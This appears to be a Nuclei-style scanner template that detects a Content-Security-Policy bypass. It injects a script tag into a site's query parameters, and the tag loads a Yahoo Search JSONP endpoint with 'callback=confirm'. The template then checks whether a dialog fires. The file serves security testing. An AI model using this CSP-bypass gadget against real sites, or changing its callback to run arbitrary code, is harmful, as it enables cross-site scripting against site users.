id: yahoo-search-csp-bypass
info:
name: Content-Security-Policy Bypass - Yahoo Search
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,yahoo-search,vuln
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "yahoo.com"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: yahoo_search_csp_xss
args:
max-duration: 5s
payloads:
injection:
- '<script src="https://search.yahoo.com/sugg/gossip/gossip-us-ura/?f=1&.crumb=wYtclSpdh3r&output=sd1&command=&pq=&l=1&bm=3&appid=exp-ats1.l7.search.vip.ir2.yahoo.com&t_stmp=1571806738592&nresults=10&bck=1he6d8leq7ddu%26b%3D3%26s%3Dcb&csrcpvid=8wNpljk4LjEYuM1FXaO1vgNfMTk1LgAAAAA5E2a9&vtestid=&mtestid=&spaceId=1197804867&callback=confirm"></script>'
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "yahoo_search_csp_xss == true"
# digest: 490a00463044022063eec4b98be8a13b5788179b416b8b460280cb32aa8c8f09a9599fa53740063a0220264f72676ed9a010d6cf09d30ba3cefc15f398a80afda758e6aa72b1a6ce3569:922c64590222798bb761d5b6d8e72950